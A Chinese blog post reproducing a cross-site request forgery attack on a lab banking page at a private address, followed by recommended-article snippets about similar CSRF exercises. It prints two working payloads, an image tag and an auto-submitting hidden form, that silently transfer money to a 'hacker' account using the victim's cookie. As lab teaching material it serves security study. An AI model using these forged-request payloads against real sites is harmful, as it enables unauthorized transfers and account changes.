CSRF漏洞场景复现

最新推荐文章于 2023-09-22 16:51:24 发布
最新推荐文章于 2023-09-22 16:51:24 发布
阅读量68 收藏
点赞数
文章标签: csrf 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/132544016
版权

黑客登录后台,发现余额为0

admin用户

 黑客诱使黑客点击危险网站

<meta charset='utf-8'>
<img src='./1.jpg'><br />
<img src='http://10.9.75.168/csrf/bank/action.php?
username=hacker&money=100&submit=%E4%BA%A4%E6%98%93'
alt='宝刀在手,谁与争锋'>

如果我们把这个html页面发给受害者,受害者点击了我们的图片,就会发送这个GET请求,从而直接调用交易接口,并且携带受害者的cookie访问,从而实现转账功能。

黑客金钱+100

 检查发现点击链接就向黑客转账100

 还可以构造POST请求

<meta charset='utf-8'>
<form name='csrf' action='http://10.9.75.168/csrf/bank/action.php' method='post'>
<input type='hidden' name='username' value='hacker'>
<input type='hidden' name='money' value='100'>
</form>
<script>document.csrf.submit()</script>
<img src="./1.jpg" ><br />
<!--<a href='javascript:document.csrf.submit()' style='color:red;font-size:100px'>宝刀在手,谁与争锋</a><br />

 

 

blackK_YC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSRF(post)漏洞
weixin_43696861的博客
05-25 1339
一、分析代码 发验证refer,没有token验证,没有防止csrf的措施 二、构建一个错误信息脚本 csrf_poc.php 放入http://192.168.56.129/pikachu-master/vul/csrf 中 <html> <body> <form name="px" method="post" action="http://192.168.56.129/pikachu-master/vul/csrf/csrf.
CSRF漏洞
zxcvbnmasdflzl的博客
07-07 753
如果可以,再去掉referer参数的内容,如果仍然可以,说明存在CSRF漏洞,可以利用构造外部form表单的形式,实攻击。如果上述post方式对referer验证的特别严格,有的时候由于程序员对请求类型判断不是很严格,可以导致post请求改写为get请求,从而CSRF。直接以get请求的方式进行访问,如果请求成功,即可以此种方式绕过对referer的检测,从而CSRF。burp生成的exp有一个按钮,需要受害用户点击,改一下exp,改成直接访问链接就直接增加一个用户。如果可以,即存在CSRF漏洞
CSRF漏洞之——漏洞
wsnbbz的博客
03-04 3159
介绍 CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的...
CSRF漏洞(含XSS与CSRF梦幻联动)
最新发布
weixin_73180072的博客
09-22 178
pikaqiu靶场。
vulhub漏洞测试靶场
08-16
这个平台基于Docker容器技术,使得每个漏洞环境可以独立运行,便于管理和各种已知的安全漏洞。 在"vulhub-master.zip"这个压缩包中,我们可以期待找到Vulhub项目的核心组成部分,包括Docker配置文件、漏洞环境...
Centos7漏洞库vulhub-master.zip
03-01
在CentOS 7上,Vulhub创建了多个漏洞场景,涵盖了Web应用、网络服务、操作系统等多个层面。下面我们将详细探讨这些知识点: 1. **Web应用漏洞**:Vulhub中可能包括了如SQL注入、XSS跨站脚本、CSRF跨站请求伪造、...
你可能不知道的CORS跨域资源共享
10-17
但像链接、重定向和表单提交等不受同源策略的限制,这为跨域攻击提供了可能,如XSS(跨站脚本攻击)和CSRF(跨站请求伪造)。 为了解决这些问题并支持安全的跨域访问,出了各种跨域解决方案。JSONP(JSON with ...
Web安全深度剖析(张柄帅)
07-25
10.1.5 检测CSRF漏洞 193 10.1.6 预防跨站请求伪造 197 10.2 逻辑错误漏洞 199 10.2.1 挖掘逻辑漏洞 199 10.2.2 绕过授权验证 200 10.2.3 密码找回逻辑漏洞 204 10.2.4 支付逻辑漏洞 205 10.2.5 指定账户恶意攻击 ...
Java-Web-PoC
05-19
例如,SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)和权限绕过等。PoC文件可能包含针对这些漏洞的特定利用代码,帮助开发者理解漏洞的工作原理以及如何避免它们。 在“CSS”这个标签下,我们可能会讨论到与...
DVWA-CSRF漏洞
m0_58265086的博客
08-28 134
8.然后将dvwa退出登录,退出登录后,发使用123456登陆不上了,这里就发一个CSRF漏洞。1.这边以DVWA为例,在CSRF这里,选择low类别。修改admin的密码为123456。2.使用bp抓了以下包,发密码在进行明文传输。这边体了bp的多功能,显了每个靶场的功能。5.选择在浏览器中测试,并制url。3. 这边通过bp生成漏洞验证码。4.修改密码为123.com。7.制到标签中并回车打开。6.并把他的url制。
DVWA之CSRF漏洞
weixin_43263451的博客
07-19 1034
CSRF(跨站请求伪造)定义跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 基本原理 从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤:   ...
漏洞(CVECVE-2017-9064(csrf漏洞))
FODKING的博客
11-29 3235
实验道具 wordpress <=4.7.4 burpsuite 实验原理 要实施一次csrf漏洞利用必须占据“天时地利人和”,即被攻击方登录了要攻击的网站,且点击了我们伪造的url才会成功。并且漏洞点处请求容易伪造。 实验场景 当管理员用户登录时,点击了攻击者事先构建好的url中的提交按钮时就会被盗取用户。 漏洞存在位置,如图1 图 1 抓包后信息如图29所示 图 2 发并没有token参数,没有不可预料的认证信息用post方式传递,我们用burpsuite自带的CSRF工具进行构建html
csrf漏洞(附源码)
qq_40390383的博客
04-14 1475
csrf全称跨站请求伪造,攻击者盗用受害者用户的身份,以受害者的身份发送恶意请求 下面进行,(本人前端、后端小白,代码有些不规范,大佬们见谅) 这里我创建了三个文件 login.php是用户的登入页面 main.php是商品购买页面 sqlcon.php存放操作数据库的各个函数。 源码如下: 以下代码不只存在csrf漏洞,还存在SQL盲注 有兴趣的可以注一下 lo...
metinfo中csrf漏洞
qq_44268631的博客
08-07 302
metinfo中csrf漏洞 打开后台登陆http://localhost/metinfo/admin/index.php,查看添加管理员代码 发并没有验证token 在添加管理界面随便输入一个管理信息 点击保存使用 urpsuit抓包 右键选择send to repeater 在repeater界面,右键打开cenerate csrf poc copy软件生成的poc脚本 把保存的poc放在软件同附站下,访问 点击,就可以在后台生成新的管理员账户 总结:漏洞比较鸡肋,必须拿到同站点才
Wordpress4.7.4-CSRF漏洞
PANDA墨森的博客
08-22 1089
#001 漏洞简介: CSRF漏洞的位置是,管理员后台的添加用户和删除用户处均存在CSRF漏洞。 #002 漏洞: Part1-添加用户的CSRF: 首先找到添加用户的页面,添加用户,如下图填入相关信息,点击添加 可以看到成功添加,接下来我们试着抓包分析一下 我们试着去抓包看一下有没有加token验证,尝试改一下参数,看能否添加其他用户,构造请求,让管理员点击,就会成功添加新的用户。 接下来具体分析和操作: 首先开启burp的代理拦截,抓包,可以看到是通过PO...
7、csrf漏洞
sigali的博客
03-17 1275
7、csrf漏洞 csrf全名为跨站请求伪造,是一种对网站的恶意利用,虽然听起来和xss很像,但是它们俩还是有很大的区别的。xss窃取了用户的cookie身份认证信息,而csrf没有窃取登录凭证,仅仅是“冒用”。 例如: 一个有csrf漏洞的A网站,网站B是攻击者构造的一个恶意网站,当用户没有退出A网站,或者用户登陆A网站的cookie没有过期,只要在同一个浏览器中打开这个网站B,攻击者就可以利用用户的身份进行用户才能进行的操作了。 这里我们用DVWA的靶场: LOW等级 抓包后,去掉Referer字段
漏洞篇——CSRF漏洞的利用
热门推荐
爱国小白帽
02-25 1万+
CSRF漏洞原理 CSRF(Cross Site Request Forgery, 跨站请求伪造)是一种网络的攻击方式,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF。 CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击...
csrf漏洞dvwa
09-13
CSRF(Cross-Site Request Forgery)是一种常见的Web应用程序安全漏洞,导致攻击者利用受害者的身份执行恶意操作。DVWA(Damn Vulnerable Web Application)是一个故意设计的Web应用程序,用于演示各种Web安全漏洞。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值